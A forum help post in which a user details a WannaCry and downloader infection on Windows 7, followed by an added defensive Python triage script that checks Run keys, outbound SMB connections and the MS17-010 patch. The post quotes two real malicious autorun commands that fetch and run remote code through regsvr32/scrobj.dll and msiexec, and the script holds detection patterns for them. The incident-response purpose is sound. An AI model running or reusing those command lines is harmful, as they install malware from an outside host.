I do not know if this is the right place to post.
Yesterday my computer (Windows 7 HB x64 SP1) was subject to a massive virus attack.
The attack was contained mostly by the COMODO HIPS and probably by some of my countermeasures, but I still need to figure out how the viruses got into my computer and whether all of the malware has been removed.
In chronological order:
- At 17:56:40 a file "mssecsvc.exe" was created in the folder "C:\Windows".
Upon COMODO HIPS alert I terminated and deleted the file.
VirusTotal scan revealed that the file is Trojan / WanaCry / WannaCryptor RansomWare.
After this the same file kept appearing in the same folder many times over several hours.
Each time I deleted the file and then after some minutes it reappeared.
- At 18:44:11 a file "c.bat" was created in the folder "C:\Windows\debug"
The same, upon HIPS alert I deleted the file.
VirusTotal did not find the file malicious at all, but a Malwr scan revealed a lot of malicious activity.
- At 19:22:03 a file "ajtce.exe" was created in the folder "C:\Windows\Temp"
- At 19:22:35 a file "ocioq.exe" was created in the folder "C:\Windows\Temp"
Both of these files were identified as Trojan Droppers.
By this time I had scanned my computer with Malwarebytes and BitDefender Adware Removal Tool, but they did not find any problems.
Next I found two new Auto Run entries:
1) Name: start
Command line: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
Process Path: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
2) Name: start1
Command line: msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
Product name: Windows Installer - Юникод (Russian for "Unicode")
Process Path: C:\Windows\system32\msiexec.exe
- At 20:48:10 a file "Fwasf.exe" was created in the folder "C:\"
- At 21:53:24 a file "huazhongdiguo.exe" was created in the folder "C:\"
Both of these files were identified as Trojan Downloaders.
I deleted both Auto Run entries and downloaded the latest version of RogueKiller. The scan did not find any substantial problems.
I rebooted the computer and did the Smart Scan with COMODO Cleaning Essentials - again no problems were found.
The file "mssecsvc.exe" kept reappearing in the folder "C:\Windows". Its actions were blocked by COMODO HIPS, but I kept deleting it every time I found it.
Other than that the computer worked normally.
By this time I had found very suspicious activity from the SYSTEM process: it was trying to connect to other users' home computers in my ISP's network, among other places. The TCP connections were made from ports 445 or 139, characteristic of the WannaCry virus.
So it looked like some virus had hijacked my computer's SYSTEM process. Over a few hours SYSTEM had downloaded to my computer about 108 MB of some data and uploaded to somewhere in the Internet about 4.5 MB.
I blocked SYSTEM from connecting to the Internet with COMODO Firewall.
Since then no new viruses have appeared on my computer, at least as far as I know: there have been no alerts.
I have been running a complete scan with COMODO Cleaning Essentials, but it is taking too long, so I will pause it. So far it is at 50% and has found no problems at all.
How can I find out how all these viruses got into my computer and whether I have removed all of the malware?
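As an added example (not part of the original post), here is a Python triage script that turns the three observations in the post into repeatable checks: it scans Run-key command lines for the two living-off-the-land patterns quoted above (regsvr32 loading a scriptlet from a URL through scrobj.dll, and msiexec installing a package from a URL), parses `netstat -ano` output for TCP connections to 445/139 on hosts outside RFC 1918 space, and looks for the MS17-010 hotfix IDs for Windows 7 SP1, since WannaCry spreads over SMB by exploiting that bug. The netstat lines, the benign "OneDrive" Run entry and the hotfix list are constructed sample data; the two malicious Run entries are the ones quoted in the post. On a real machine you would feed it the output of `netstat -ano`, `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKCU equivalent) and `wmic qfe get HotFixID` instead.

```python
import ipaddress
import re

# Constructed sample of `netstat -ano` output. The addresses and PIDs are
# made up for illustration; PID 4 is the System process on Windows.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    192.168.1.20:49170     93.184.216.34:443      ESTABLISHED     2344
  TCP    192.168.1.20:49201     203.0.113.77:445       SYN_SENT        4
  TCP    192.168.1.20:49202     203.0.113.78:445       SYN_SENT        4
  TCP    192.168.1.20:49203     198.51.100.9:139       SYN_SENT        4
  TCP    192.168.1.20:49204     192.168.1.1:445        ESTABLISHED     4
  UDP    0.0.0.0:5355           *:*                                    1080
"""

# Run-key entries: the first two are the command lines quoted in the post,
# the third is a constructed benign entry so the filter has something to ignore.
SAMPLE_RUN_ENTRIES = {
    "start":  "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll",
    "start1": "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q",
    "OneDrive": '"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
}

# Constructed list of installed hotfixes, e.g. from `wmic qfe get HotFixID`.
SAMPLE_HOTFIXES = ["KB2533623", "KB3020369", "KB4012215"]

# Living-off-the-land patterns matching the two Auto Run entries in the post.
AUTORUN_RULES = [
    ("regsvr32 loading a scriptlet from a URL via scrobj.dll",
     re.compile(r"regsvr32\b.*/i:https?://.*scrobj\.dll", re.I)),
    ("msiexec installing a package straight from a URL",
     re.compile(r"msiexec(\.exe)?\s.*/i\s+https?://", re.I)),
]

def audit_run_entries(entries):
    """Return (entry name, rule label, command line) for each suspicious Run entry."""
    findings = []
    for name, cmd in entries.items():
        for label, rx in AUTORUN_RULES:
            if rx.search(cmd):
                findings.append((name, label, cmd))
    return findings

NETSTAT_TCP = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")
SMB_PORTS = {445, 139}
# RFC 1918, loopback and link-local: SMB to these is ordinary LAN file sharing.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
               "127.0.0.0/8", "169.254.0.0/16")]

def _split_endpoint(endpoint):
    host, port = endpoint.rsplit(":", 1)      # also handles [ipv6]:port
    return host.strip("[]"), int(port)

def find_outbound_smb(netstat_text):
    """Return (pid, remote host, remote port, state) for every TCP connection
    to 445 or 139 on a host outside the local ranges above."""
    hits = []
    for line in netstat_text.splitlines():
        m = NETSTAT_TCP.match(line)
        if not m:
            continue
        _local, remote, state, pid = m.groups()
        rhost, rport = _split_endpoint(remote)
        if rport not in SMB_PORTS or state == "LISTENING":
            continue
        try:
            addr = ipaddress.ip_address(rhost)
        except ValueError:
            continue
        if any(addr in net for net in LOCAL_NETS):
            continue
        hits.append((int(pid), rhost, rport, state))
    return hits

# MS17-010 for Windows 7 SP1: KB4012212 (security-only) or KB4012215 (monthly rollup).
# Later monthly rollups supersede these, so "missing" means "go and verify", not "unpatched".
MS17_010_WIN7 = {"KB4012212", "KB4012215"}

def ms17_010_patched(installed_hotfixes):
    return bool(MS17_010_WIN7 & {h.strip().upper() for h in installed_hotfixes})

def triage(netstat_text, run_entries, hotfixes):
    """Bundle the three checks into one report dict."""
    smb = find_outbound_smb(netstat_text)
    by_pid = {}
    for pid, *_ in smb:                       # a burst of SYN_SENT from one PID = scanner
        by_pid[pid] = by_pid.get(pid, 0) + 1
    return {
        "suspicious_autoruns": audit_run_entries(run_entries),
        "outbound_smb": smb,
        "smb_scanners_by_pid": by_pid,
        "ms17_010_patched": ms17_010_patched(hotfixes),
    }

if __name__ == "__main__":
    report = triage(SAMPLE_NETSTAT, SAMPLE_RUN_ENTRIES, SAMPLE_HOTFIXES)
    for name, label, cmd in report["suspicious_autoruns"]:
        print(f"[autorun] {name}: {label}\n    {cmd}")
    for pid, host, port, state in report["outbound_smb"]:
        print(f"[smb] PID {pid} -> {host}:{port} ({state})")
    print("MS17-010 hotfix present:", report["ms17_010_patched"])
```

Two design points: the SMB filter deliberately ignores RFC 1918 targets so a NAS or a neighbour's share on the LAN does not drown the signal, and the hotfix check is only a hint, because a later cumulative rollup would carry the same fix under a different KB number. Run the checks again after cleanup; persistence that keeps re-creating mssecsvc.exe will show up as a Run entry or a SYN_SENT burst long before an on-demand scanner flags the file.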